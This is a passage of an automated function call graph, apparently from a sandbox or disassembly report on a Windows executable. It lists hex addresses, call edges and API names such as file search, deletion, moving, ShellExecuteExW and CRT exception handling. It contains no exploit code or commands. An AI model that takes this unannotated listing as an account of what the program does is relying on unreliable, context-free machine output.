25741 b48fdb 25620->25741 25623 b4145d 78 API calls 25624 b4ab9b 25623->25624 25625 b4f0d7 132 API calls 25624->25625 25626 b4abae 25625->25626 25627 b4abf6 25626->25627 25629 b4f0d7 132 API calls 25626->25629 25744 b4f2c3 97 API calls __InternalCxxFrameHandler 25626->25744 25627->25451 25629->25626 25630->25456 25631->25459 25632->25468 25633->25401 25634->25374 25635->25374 25642 b46731 25636->25642 25639 b46731 6 API calls 25640 b46873 25639->25640 25640->25548 25641->25548 25643 b4673b 25642->25643 25644 b4d63a 5 API calls 25643->25644 25650 b46765 25644->25650 25645 b46833 25646 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25645->25646 25647 b46845 25646->25647 25647->25639 25647->25640 25648 b4d63a 5 API calls 25648->25650 25650->25645 25650->25648 25651 b4d122 6 API calls 3 library calls 25650->25651 25651->25650 25652->25558 25653->25556 25654->25568 25655->25573 25656->25572 25674 b55617 25657->25674 25659 b58c9d __InternalCxxFrameHandler 25659->25659 25661 b590ae 25659->25661 25678 b4f0d7 25659->25678 25689 b5306d 25659->25689 25695 b55e86 132 API calls 25659->25695 25696 b59111 132 API calls 25659->25696 25697 b532af 81 API calls 25659->25697 25698 b55991 98 API calls __InternalCxxFrameHandler 25659->25698 25699 b5976f 137 API calls __InternalCxxFrameHandler 25659->25699 25700 b5725b 98 API calls __InternalCxxFrameHandler 25661->25700 25663 b590be __InternalCxxFrameHandler 25664 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25663->25664 25665 b59108 25664->25665 25665->25582 25672->25582 25673->25582 25676 b55623 __EH_prolog3 __cftof ___std_exception_copy 25674->25676 25675 b55709 25675->25659 25676->25675 25701 b47c32 75 API calls 25676->25701 25686 b4f0ed __InternalCxxFrameHandler 25678->25686 25679 b4f25d 25680 b4f291 25679->25680 25702 b4f08e 25679->25702 25682 b4f2b2 25680->25682 25708 b46c92 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25680->25708 25709 b52ee4 25682->25709 25686->25679 25687 b4f254 25686->25687 25706 b4ca4c 91 API calls __EH_prolog3 25686->25706 25707 b5ab94 117 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25686->25707 25687->25659 25690 b53079 25689->25690 25691 b5307e 25689->25691 25725 b53105 25690->25725 25692 b5308e 25691->25692 25733 b532af 81 API calls 25691->25733 25692->25659 25695->25659 25696->25659 25697->25659 25698->25659 25699->25659 25700->25663 25701->25676 25703 b4f0d3 25702->25703 25704 b4f096 25702->25704 25703->25680 25704->25703 25715 b53ca6 25704->25715 25706->25686 25707->25686 25708->25682 25710 b52eeb 25709->25710 25711 b52f06 25710->25711 25723 b47ba8 RaiseException Concurrency::cancel_current_task 25710->25723 25713 b52f17 SetThreadExecutionState 25711->25713 25724 b47ba8 RaiseException Concurrency::cancel_current_task 25711->25724 25713->25687 25718 b6017f 25715->25718 25719 b522ef 25718->25719 25720 b60196 SendDlgItemMessageW 25719->25720 25721 b5d864 PeekMessageW GetMessageW IsDialogMessageW TranslateMessage DispatchMessageW 25720->25721 25722 b53cc6 25721->25722 25722->25703 25723->25711 25724->25713 25729 b5317e 25725->25729 25730 b53110 25725->25730 25726 b53115 CreateThread 25726->25730 25737 b53240 25726->25737 25728 b5316d SetThreadPriority 25728->25730 25729->25691 25730->25726 25730->25728 25730->25729 25734 b47bad 76 API calls 2 library calls 25730->25734 25735 b47d49 76 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25730->25735 25736 b47ba8 RaiseException Concurrency::cancel_current_task 25730->25736 25733->25692 25734->25730 25735->25730 25736->25730 25740 b5324e 84 API calls 25737->25740 25739 b53249 25740->25739 25745 b4d076 25741->25745 25744->25626 25746 b4d09c GetVersionExW 25745->25746 25747 b4d0c9 25745->25747 25746->25747 25748 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25747->25748 25749 b48fe0 25748->25749 25749->25623 25752->25480 25754 b4c4b2 25753->25754 25755 b4c4e5 FindFirstFileW 25754->25755 25756 b4c548 FindNextFileW 25754->25756 25758 b4c4f2 25755->25758 25759 b4c52d 25755->25759 25757 b4c553 GetLastError 25756->25757 25756->25759 25757->25759 25760 b4da1e 6 API calls 25758->25760 25764 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25759->25764 25761 b4c505 25760->25761 25762 b4c522 GetLastError 25761->25762 25763 b4c509 FindFirstFileW 25761->25763 25762->25759 25763->25759 25763->25762 25765 b4c39f 25764->25765 25765->25310 25765->25313 25766->25252 25768 b543a0 25767->25768 25769 b543b9 25768->25769 25772 b543cd 25768->25772 25774 b52fc9 86 API calls 25769->25774 25771 b543c0 Concurrency::cancel_current_task 25771->25772 25774->25771 25783 b5c574 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25775->25783 25777 b5c55d 25779 b5c569 25777->25779 25784 b5c595 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25777->25784 25779->25043 25779->25046 25780->25054 25781->25054 25782->25057 25783->25777 25784->25779 25786 b4b982 78 API calls 25785->25786 25787 b420f7 25786->25787 25788 b42114 25787->25788 25789 b41b63 116 API calls 25787->25789 25788->25073 25788->25074 25790 b42104 25789->25790 25790->25788 25796 b41407 74 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25790->25796 25793 b41b1a 25792->25793 25794 b41b1e 25792->25794 25793->25077 25797 b41a55 25794->25797 25796->25788 25798 b41a67 25797->25798 25799 b41aa4 25797->25799 25800 b4441e 116 API calls 25798->25800 25805 b448bd 25799->25805 25803 b41a87 25800->25803 25803->25793 25806 b448c6 25805->25806 25807 b4441e 116 API calls 25806->25807 25808 b52ee4 2 API calls 25806->25808 25809 b41ac5 25806->25809 25807->25806 25808->25806 25809->25803 25810 b41fb0 25809->25810 25811 b41fbc __EH_prolog3 25810->25811 25822 b444ab 25811->25822 25814 b418b2 78 API calls 25815 b41ff0 25814->25815 25854 b4199b 78 API calls 25815->25854 25817 b42060 25817->25803 25818 b42008 25820 b42014 _wcslen 25818->25820 25855 b53d10 MultiByteToWideChar 25818->25855 25856 b4199b 78 API calls 25820->25856 25823 b444c6 25822->25823 25824 b444f4 25823->25824 25825 b44510 25823->25825 25857 b41407 74 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25824->25857 25826 b4476a 25825->25826 25830 b4453c 25825->25830 25863 b41407 74 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25826->25863 25829 b444ff 25831 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25829->25831 25830->25829 25833 b553f0 75 API calls 25830->25833 25832 b41fdf 25831->25832 25832->25814 25832->25817 25839 b44589 25833->25839 25834 b445bb 25835 b44646 25834->25835 25853 b445b2 25834->25853 25860 b4f014 97 API calls 25834->25860 25837 b4c94d 27 API calls 25835->25837 25836 b445b7 25836->25834 25859 b425da 78 API calls 25836->25859 25844 b44659 25837->25844 25838 b445a7 25858 b41407 74 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25838->25858 25839->25834 25839->25836 25839->25838 25841 b54396 86 API calls 25841->25829 25845 b446f2 25844->25845 25846 b446e2 25844->25846 25848 b55099 137 API calls 25845->25848 25847 b4ab81 137 API calls 25846->25847 25849 b446f0 25847->25849 25848->25849 25861 b4c905 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25849->25861 25851 b4472a 25851->25853 25862 b4240a 74 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 25851->25862 25853->25841 25854->25818 25855->25820 25856->25817 25857->25829 25858->25853 25859->25834 25860->25835 25861->25851 25862->25853 25863->25829 25865 b61590 25864->25865 25866 b4bcea GetFileAttributesW 25865->25866 25867 b4bd07 25866->25867 25868 b4bd2c 25866->25868 25869 b4da1e 6 API calls 25867->25869 25870 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25868->25870 25871 b4bd19 25869->25871 25872 b4bcd4 25870->25872 25871->25868 25873 b4bd1d GetFileAttributesW 25871->25873 25872->24828 25872->24843 25873->25868 25875 b5132e 25874->25875 25876 b512ff 25874->25876 25875->25095 25883 b528ab 25876->25883 25879 b5130f GetProcAddress GetProcAddress 25879->25875 25880->25100 25881->25102 25882->25097 25884 b61590 25883->25884 25885 b528b8 GetSystemDirectoryW 25884->25885 25886 b528de 25885->25886 25887 b528fa 25885->25887 25888 b4dd18 5 API calls 25886->25888 25889 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25887->25889 25890 b528ed LoadLibraryW 25888->25890 25891 b51309 25889->25891 25890->25887 25891->25875 25891->25879 26641 b6daed 6 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 26642 b582d0 137 API calls __InternalCxxFrameHandler 26505 b5f6de 26519 b5ea83 _wcslen _wcsrchr 26505->26519 26506 b5d5dd 6 API calls 26506->26519 26507 b5f717 26508 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26507->26508 26509 b5f732 26508->26509 26510 b5ed57 SetWindowTextW 26510->26519 26513 b4dd18 5 API calls 26513->26519 26514 b666ae 22 API calls 26514->26519 26516 b5eb4b SetFileAttributesW 26518 b5ec05 GetFileAttributesW 26516->26518 26533 b5eb65 __cftof _wcslen 26516->26533 26518->26519 26521 b5ec17 DeleteFileW 26518->26521 26519->26506 26519->26507 26519->26510 26519->26513 26519->26514 26519->26516 26522 b5d41c 100 API calls 26519->26522 26525 b5f73c 26519->26525 26530 b5ef75 SendMessageW 26519->26530 26534 b5c5dd GetCurrentDirectoryW 26519->26534 26536 b4c3de 11 API calls 26519->26536 26537 b4c367 FindClose 26519->26537 26538 b5d76e 76 API calls 3 library calls 26519->26538 26521->26519 26523 b5ec28 26521->26523 26524 b5ef35 GetDlgItem SetWindowTextW SendMessageW 26522->26524 26528 b44c00 _swprintf 51 API calls 26523->26528 26524->26519 26539 b613f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 26525->26539 26527 b5f741 26529 b5ec48 GetFileAttributesW 26528->26529 26529->26523 26531 b5ec5d MoveFileW 26529->26531 26530->26519 26531->26519 26532 b5ec75 MoveFileExW 26531->26532 26532->26519 26533->26518 26533->26519 26535 b4d8ac 51 API calls 2 library calls 26533->26535 26534->26519 26535->26533 26536->26519 26537->26519 26538->26519 26539->26527 26574 b5d8c0 98 API calls 26575 b41025 29 API calls 26576 b44c20 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26646 b42620 97 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 26647 b6ca20 21 API calls 2 library calls 26650 b62610 RaiseException Concurrency::cancel_current_task _com_error::_com_error 26580 b5c000 28 API calls 24752 b41075 24753 b511a5 41 API calls 24752->24753 24754 b4107a 24753->24754 24757 b61932 29 API calls 24754->24757 24756 b41084 24757->24756 26582 b68870 QueryPerformanceFrequency QueryPerformanceCounter 26654 b71a71 21 API calls __vsnwprintf_l 24762 b6067c 14 API calls ___delayLoadHelper2@8 26586 b71850 51 API calls 26434 b5f05c 26440 b5f07f 26434->26440 26435 b5d5dd 6 API calls 26451 b5ea83 _wcslen _wcsrchr 26435->26451 26437 b5f717 26438 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26437->26438 26439 b5f732 26438->26439 26440->26451 26465 b5fafc 26440->26465 26441 b5ed57 SetWindowTextW 26441->26451 26444 b4dd18 5 API calls 26444->26451 26445 b666ae 22 API calls 26445->26451 26447 b5eb4b SetFileAttributesW 26449 b5ec05 GetFileAttributesW 26447->26449 26450 b5eb65 __cftof _wcslen 26447->26450 26449->26451 26453 b5ec17 DeleteFileW 26449->26453 26450->26449 26450->26451 26487 b4d8ac 51 API calls 2 library calls 26450->26487 26451->26435 26451->26437 26451->26441 26451->26444 26451->26445 26451->26447 26454 b5d41c 100 API calls 26451->26454 26456 b5f73c 26451->26456 26462 b5ef75 SendMessageW 26451->26462 26486 b5c5dd GetCurrentDirectoryW 26451->26486 26488 b4c3de 11 API calls 26451->26488 26489 b4c367 FindClose 26451->26489 26490 b5d76e 76 API calls 3 library calls 26451->26490 26453->26451 26458 b5ec28 26453->26458 26455 b5ef35 GetDlgItem SetWindowTextW SendMessageW 26454->26455 26455->26451 26491 b613f9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 26456->26491 26460 b44c00 _swprintf 51 API calls 26458->26460 26459 b5f741 26461 b5ec48 GetFileAttributesW 26460->26461 26461->26458 26463 b5ec5d MoveFileW 26461->26463 26462->26451 26463->26451 26464 b5ec75 MoveFileExW 26463->26464 26464->26451 26471 b5fb06 __cftof _wcslen 26465->26471 26466 b5fd7e 26467 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26466->26467 26468 b5fd8f 26467->26468 26468->26451 26469 b4bccb 8 API calls 26470 b5fc54 26469->26470 26472 b5fc73 ShellExecuteExW 26470->26472 26492 b4d563 8 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 26470->26492 26471->26466 26471->26469 26472->26466 26477 b5fc86 26472->26477 26474 b5fc6b 26474->26472 26475 b5fcb8 26493 b6004d 6 API calls 26475->26493 26476 b5fd0e CloseHandle 26479 b5fd1c 26476->26479 26477->26475 26477->26476 26478 b5fcae ShowWindow 26477->26478 26478->26475 26479->26466 26482 b5fd75 ShowWindow 26479->26482 26481 b5fcd0 26481->26476 26483 b5fce3 GetExitCodeProcess 26481->26483 26482->26466 26483->26476 26484 b5fcf6 26483->26484 26484->26476 26486->26451 26487->26450 26488->26451 26489->26451 26490->26451 26491->26459 26492->26474 26493->26481 26496 b4b45f 26502 b4b469 26496->26502 26497 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26499 b4b50b 26497->26499 26498 b4b5b6 26500 b4b5dd SetFilePointer 26498->26500 26501 b4b5fa GetLastError 26500->26501 26503 b4b48d 26500->26503 26501->26503 26502->26498 26502->26500 26502->26503 26504 b4b1e6 79 API calls 26502->26504 26503->26497 26504->26498 26548 b6d240 26549 b6d24b 26548->26549 26550 b6d55a 11 API calls 26549->26550 26551 b6d274 26549->26551 26552 b6d270 26549->26552 26550->26549 26554 b6d2a0 DeleteCriticalSection 26551->26554 26554->26552 26591 b6239f 9 API calls 2 library calls 26593 b611bf 48 API calls _unexpected 24371 b4b9ba 24372 b4b9cf 24371->24372 24373 b4b9c8 24371->24373 24374 b4b9dc GetStdHandle 24372->24374 24381 b4b9eb 24372->24381 24374->24381 24375 b4ba43 WriteFile 24375->24381 24376 b4ba14 WriteFile 24377 b4ba0f 24376->24377 24376->24381 24377->24376 24377->24381 24379 b4bad5 24383 b47e45 77 API calls 24379->24383 24381->24373 24381->24375 24381->24376 24381->24377 24381->24379 24382 b47b1e 78 API calls 24381->24382 24382->24381 24383->24373 24384 b421a5 24385 b421b0 24384->24385 24386 b421b8 24384->24386 24403 b421ca 27 API calls Concurrency::cancel_current_task 24385->24403 24387 b421b6 24386->24387 24390 b6121c 24386->24390 24391 b61221 ___std_exception_copy 24390->24391 24392 b6123b 24391->24392 24394 b6123d 24391->24394 24406 b6a2ec 7 API calls 2 library calls 24391->24406 24392->24387 24395 b44adb Concurrency::cancel_current_task 24394->24395 24397 b61247 24394->24397 24404 b647d0 RaiseException 24395->24404 24407 b647d0 RaiseException 24397->24407 24398 b44af7 24400 b44b0d 24398->24400 24405 b413db 26 API calls Concurrency::cancel_current_task 24398->24405 24400->24387 24401 b61de0 24403->24387 24404->24398 24405->24400 24406->24391 24407->24401 26595 b5cda0 73 API calls 26662 b4af90 80 API calls Concurrency::cancel_current_task 26663 b5c390 GdipDisposeImage GdipFree 26597 b74590 CloseHandle 26666 b5d384 GetDlgItem EnableWindow ShowWindow SendMessageW 24479 b60782 24480 b60686 24479->24480 24481 b60d3a ___delayLoadHelper2@8 14 API calls 24480->24481 24481->24480 24482 b6e180 24483 b6e192 24482->24483 24484 b6e189 24482->24484 24486 b6e077 24484->24486 24506 b6b9a5 GetLastError 24486->24506 24488 b6e084 24526 b6e19e 24488->24526 24490 b6e08c 24535 b6de0b 24490->24535 24493 b6e0a3 24493->24483 24496 b6e0e6 24560 b6bafa 24496->24560 24500 b6e0e1 24559 b6bc7b 20 API calls _abort 24500->24559 24502 b6e12a 24502->24496 24566 b6dce1 26 API calls 24502->24566 24503 b6e0fe 24503->24502 24504 b6bafa _free 20 API calls 24503->24504 24504->24502 24507 b6b9c1 24506->24507 24508 b6b9bb 24506->24508 24512 b6ba10 SetLastError 24507->24512 24568 b6d786 24507->24568 24567 b6d4ab 11 API calls 2 library calls 24508->24567 24512->24488 24513 b6b9db 24515 b6bafa _free 20 API calls 24513->24515 24517 b6b9e1 24515->24517 24516 b6b9f0 24516->24513 24518 b6b9f7 24516->24518 24519 b6ba1c SetLastError 24517->24519 24576 b6b810 20 API calls _abort 24518->24576 24577 b6b584 38 API calls _abort 24519->24577 24522 b6ba02 24524 b6bafa _free 20 API calls 24522->24524 24525 b6ba09 24524->24525 24525->24512 24525->24519 24527 b6e1aa ___scrt_is_nonwritable_in_current_image 24526->24527 24528 b6b9a5 _abort 38 API calls 24527->24528 24530 b6e1b4 24528->24530 24531 b6e238 _abort 24530->24531 24534 b6bafa _free 20 API calls 24530->24534 24580 b6b584 38 API calls _abort 24530->24580 24581 b6d281 EnterCriticalSection 24530->24581 24582 b6e22f LeaveCriticalSection _abort 24530->24582 24531->24490 24534->24530 24583 b66dd4 24535->24583 24538 b6de3e 24540 b6de43 GetACP 24538->24540 24541 b6de55 24538->24541 24539 b6de2c GetOEMCP 24539->24541 24540->24541 24541->24493 24542 b6bc8e 24541->24542 24543 b6bccc 24542->24543 24548 b6bc9c _abort 24542->24548 24594 b6bc7b 20 API calls _abort 24543->24594 24545 b6bcb7 RtlAllocateHeap 24546 b6bcca 24545->24546 24545->24548 24546->24496 24549 b6e240 24546->24549 24548->24543 24548->24545 24593 b6a2ec 7 API calls 2 library calls 24548->24593 24550 b6de0b 40 API calls 24549->24550 24551 b6e25f 24550->24551 24554 b6e2b0 IsValidCodePage 24551->24554 24556 b6e266 24551->24556 24558 b6e2d5 __cftof 24551->24558 24552 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 24553 b6e0d9 24552->24553 24553->24500 24553->24503 24555 b6e2c2 GetCPInfo 24554->24555 24554->24556 24555->24556 24555->24558 24556->24552 24595 b6dee3 GetCPInfo 24558->24595 24559->24496 24561 b6bb05 RtlFreeHeap 24560->24561 24562 b6bb2e __dosmaperr 24560->24562 24561->24562 24563 b6bb1a 24561->24563 24562->24493 24664 b6bc7b 20 API calls _abort 24563->24664 24565 b6bb20 GetLastError 24565->24562 24566->24496 24567->24507 24573 b6d793 _abort 24568->24573 24569 b6d7d3 24579 b6bc7b 20 API calls _abort 24569->24579 24570 b6d7be RtlAllocateHeap 24571 b6b9d3 24570->24571 24570->24573 24571->24513 24575 b6d501 11 API calls 2 library calls 24571->24575 24573->24569 24573->24570 24578 b6a2ec 7 API calls 2 library calls 24573->24578 24575->24516 24576->24522 24578->24573 24579->24571 24581->24530 24582->24530 24584 b66df1 24583->24584 24585 b66de7 24583->24585 24584->24585 24586 b6b9a5 _abort 38 API calls 24584->24586 24585->24538 24585->24539 24587 b66e12 24586->24587 24591 b6bf86 38 API calls __cftof 24587->24591 24589 b66e2b 24592 b6bfb3 38 API calls __cftof 24589->24592 24591->24589 24592->24585 24593->24548 24594->24546 24601 b6df1d 24595->24601 24604 b6dfc7 24595->24604 24598 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 24600 b6e073 24598->24600 24600->24556 24605 b6efd8 24601->24605 24603 b6d1c8 __vsnwprintf_l 43 API calls 24603->24604 24604->24598 24606 b66dd4 __cftof 38 API calls 24605->24606 24607 b6eff8 MultiByteToWideChar 24606->24607 24609 b6f036 24607->24609 24610 b6f0ce 24607->24610 24613 b6f057 __cftof __vsnwprintf_l 24609->24613 24614 b6bc8e __vsnwprintf_l 21 API calls 24609->24614 24611 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 24610->24611 24615 b6df7e 24611->24615 24612 b6f0c8 24624 b6d213 20 API calls _free 24612->24624 24613->24612 24617 b6f09c MultiByteToWideChar 24613->24617 24614->24613 24619 b6d1c8 24615->24619 24617->24612 24618 b6f0b8 GetStringTypeW 24617->24618 24618->24612 24620 b66dd4 __cftof 38 API calls 24619->24620 24621 b6d1db 24620->24621 24625 b6cfab 24621->24625 24624->24610 24626 b6cfc6 __vsnwprintf_l 24625->24626 24627 b6cfec MultiByteToWideChar 24626->24627 24628 b6d016 24627->24628 24629 b6d1a0 24627->24629 24632 b6bc8e __vsnwprintf_l 21 API calls 24628->24632 24635 b6d037 __vsnwprintf_l 24628->24635 24630 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 24629->24630 24631 b6d1b3 24630->24631 24631->24603 24632->24635 24633 b6d080 MultiByteToWideChar 24634 b6d0ec 24633->24634 24636 b6d099 24633->24636 24661 b6d213 20 API calls _free 24634->24661 24635->24633 24635->24634 24652 b6d5bc 24636->24652 24640 b6d0c3 24640->24634 24642 b6d5bc __vsnwprintf_l 11 API calls 24640->24642 24641 b6d0fb 24644 b6bc8e __vsnwprintf_l 21 API calls 24641->24644 24647 b6d11c __vsnwprintf_l 24641->24647 24642->24634 24643 b6d191 24660 b6d213 20 API calls _free 24643->24660 24644->24647 24645 b6d5bc __vsnwprintf_l 11 API calls 24648 b6d170 24645->24648 24647->24643 24647->24645 24648->24643 24649 b6d17f WideCharToMultiByte 24648->24649 24649->24643 24650 b6d1bf 24649->24650 24662 b6d213 20 API calls _free 24650->24662 24653 b6d2e8 _abort 5 API calls 24652->24653 24654 b6d5e3 24653->24654 24657 b6d5ec 24654->24657 24663 b6d644 10 API calls 3 library calls 24654->24663 24656 b6d62c LCMapStringW 24656->24657 24658 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 24657->24658 24659 b6d0b0 24658->24659 24659->24634 24659->24640 24659->24641 24660->24634 24661->24629 24662->24634 24663->24656 24664->24565 26598 b62580 LocalFree 26667 b5ea83 121 API calls 5 library calls 26600 b629e0 51 API calls 2 library calls 25895 b511eb 25896 b511f3 FreeLibrary 25895->25896 25897 b511fb 25895->25897 25896->25897 25898 b61bd2 25899 b61bde ___scrt_is_nonwritable_in_current_image 25898->25899 25930 b6176c 25899->25930 25901 b61be5 25902 b61d38 25901->25902 25905 b61c0f 25901->25905 26009 b61fca 4 API calls 2 library calls 25902->26009 25904 b61d3f 26002 b6a7aa 25904->26002 25917 b61c4e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 25905->25917 25941 b6b34d 25905->25941 25911 b61c2e 25914 b61caf 25949 b620e5 GetStartupInfoW __cftof 25914->25949 25916 b61cb5 25950 b6b29e 51 API calls 25916->25950 25917->25914 26005 b6a29c 38 API calls _abort 25917->26005 25920 b61cbd 25951 b6037c 25920->25951 25924 b61cd1 25924->25904 25925 b61cd5 25924->25925 25926 b61cde 25925->25926 26007 b6a74d 28 API calls _abort 25925->26007 26008 b618dd 12 API calls ___scrt_uninitialize_crt 25926->26008 25929 b61ce6 25929->25911 25931 b61775 25930->25931 26011 b61de6 IsProcessorFeaturePresent 25931->26011 25933 b61781 26012 b6507e 25933->26012 25935 b61786 25940 b6178a 25935->25940 26020 b6b1d7 25935->26020 25938 b617a1 25938->25901 25940->25901 25942 b6b364 25941->25942 25943 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25942->25943 25944 b61c28 25943->25944 25944->25911 25945 b6b2f1 25944->25945 25946 b6b320 25945->25946 25947 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25946->25947 25948 b6b349 25947->25948 25948->25917 25949->25916 25950->25920 26118 b5290a 25951->26118 25955 b603aa 26174 b5ccd9 25955->26174 25957 b603b3 __cftof 25958 b603c6 GetCommandLineW 25957->25958 25959 b6046a GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 25958->25959 25960 b603d9 25958->25960 25962 b44c00 _swprintf 51 API calls 25959->25962 26178 b5e872 25960->26178 25963 b604e6 SetEnvironmentVariableW GetModuleHandleW LoadIconW 25962->25963 26193 b5d9dd LoadBitmapW 25963->26193 25966 b603e7 OpenFileMappingW 25970 b603ff MapViewOfFile 25966->25970 25971 b6045b CloseHandle 25966->25971 25967 b60464 26185 b5ffdd 25967->26185 25973 b60454 UnmapViewOfFile 25970->25973 25974 b60410 __InternalCxxFrameHandler 25970->25974 25971->25959 25973->25971 25977 b5ffdd 7 API calls 25974->25977 25979 b6042c 25977->25979 25981 b5136b 82 API calls 25979->25981 25980 b5afe6 27 API calls 25982 b60546 DialogBoxParamW 25980->25982 25983 b60440 25981->25983 25986 b60580 25982->25986 25984 b51421 82 API calls 25983->25984 25985 b6044b 25984->25985 25985->25973 25987 b60592 Sleep 25986->25987 25988 b60599 25986->25988 25987->25988 25991 b605a7 25988->25991 26223 b5cf89 7 API calls 3 library calls 25988->26223 25990 b605c6 DeleteObject 25992 b605e2 25990->25992 25993 b605db DeleteObject 25990->25993 25991->25990 25994 b60625 25992->25994 25995 b60613 25992->25995 25993->25992 26220 b5cd3f 25994->26220 26224 b6004d 6 API calls 25995->26224 25997 b60619 CloseHandle 25997->25994 25999 b6065f 26000 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 25999->26000 26001 b60673 26000->26001 26006 b6211b GetModuleHandleW 26001->26006 26356 b6a527 26002->26356 26005->25914 26006->25924 26007->25926 26008->25929 26009->25904 26011->25933 26024 b66127 26012->26024 26016 b6508f 26017 b6509a 26016->26017 26038 b66163 DeleteCriticalSection 26016->26038 26017->25935 26019 b65087 26019->25935 26065 b6e6aa 26020->26065 26023 b6509d 7 API calls 2 library calls 26023->25940 26025 b66130 26024->26025 26027 b66159 26025->26027 26028 b65083 26025->26028 26039 b6636c 26025->26039 26044 b66163 DeleteCriticalSection 26027->26044 26028->26019 26030 b651ac 26028->26030 26058 b6627d 26030->26058 26033 b651c1 26033->26016 26035 b651cf 26036 b651dc 26035->26036 26064 b651df 6 API calls ___vcrt_FlsFree 26035->26064 26036->26016 26038->26019 26045 b66192 26039->26045 26042 b663a4 InitializeCriticalSectionAndSpinCount 26043 b6638f 26042->26043 26043->26025 26044->26028 26046 b661b3 26045->26046 26047 b661af 26045->26047 26046->26047 26048 b6621b GetProcAddress 26046->26048 26051 b6620c 26046->26051 26053 b66232 LoadLibraryExW 26046->26053 26047->26042 26047->26043 26048->26047 26050 b66229 26048->26050 26050->26047 26051->26048 26052 b66214 FreeLibrary 26051->26052 26052->26048 26054 b66279 26053->26054 26055 b66249 GetLastError 26053->26055 26054->26046 26055->26054 26056 b66254 ___vcrt_FlsSetValue 26055->26056 26056->26054 26057 b6626a LoadLibraryExW 26056->26057 26057->26046 26059 b66192 ___vcrt_FlsSetValue 5 API calls 26058->26059 26060 b66297 26059->26060 26061 b662b0 TlsAlloc 26060->26061 26062 b651b6 26060->26062 26062->26033 26063 b6632e 6 API calls ___vcrt_FlsSetValue 26062->26063 26063->26035 26064->26033 26068 b6e6c7 26065->26068 26069 b6e6c3 26065->26069 26066 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26067 b61793 26066->26067 26067->25938 26067->26023 26068->26069 26071 b6ccf0 26068->26071 26069->26066 26072 b6ccfc ___scrt_is_nonwritable_in_current_image 26071->26072 26083 b6d281 EnterCriticalSection 26072->26083 26074 b6cd03 26084 b6eb78 26074->26084 26076 b6cd12 26082 b6cd21 26076->26082 26097 b6cb79 29 API calls 26076->26097 26079 b6cd1c 26098 b6cc2f GetStdHandle GetFileType 26079->26098 26080 b6cd32 _abort 26080->26068 26099 b6cd3d LeaveCriticalSection _abort 26082->26099 26083->26074 26085 b6eb84 ___scrt_is_nonwritable_in_current_image 26084->26085 26086 b6eb91 26085->26086 26087 b6eba8 26085->26087 26108 b6bc7b 20 API calls _abort 26086->26108 26100 b6d281 EnterCriticalSection 26087->26100 26090 b6eb96 26109 b66649 26 API calls __cftof 26090->26109 26092 b6ebe0 26110 b6ec07 LeaveCriticalSection _abort 26092->26110 26094 b6eba0 _abort 26094->26076 26096 b6ebb4 26096->26092 26101 b6eac9 26096->26101 26097->26079 26098->26082 26099->26080 26100->26096 26102 b6d786 _abort 20 API calls 26101->26102 26104 b6eadb 26102->26104 26103 b6eae8 26105 b6bafa _free 20 API calls 26103->26105 26104->26103 26111 b6d55a 26104->26111 26107 b6eb3a 26105->26107 26107->26096 26108->26090 26109->26094 26110->26094 26112 b6d2e8 _abort 5 API calls 26111->26112 26113 b6d581 26112->26113 26114 b6d59f InitializeCriticalSectionAndSpinCount 26113->26114 26115 b6d58a 26113->26115 26114->26115 26116 b610f9 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 26115->26116 26117 b6d5b6 26116->26117 26117->26104 26119 b61590 26118->26119 26120 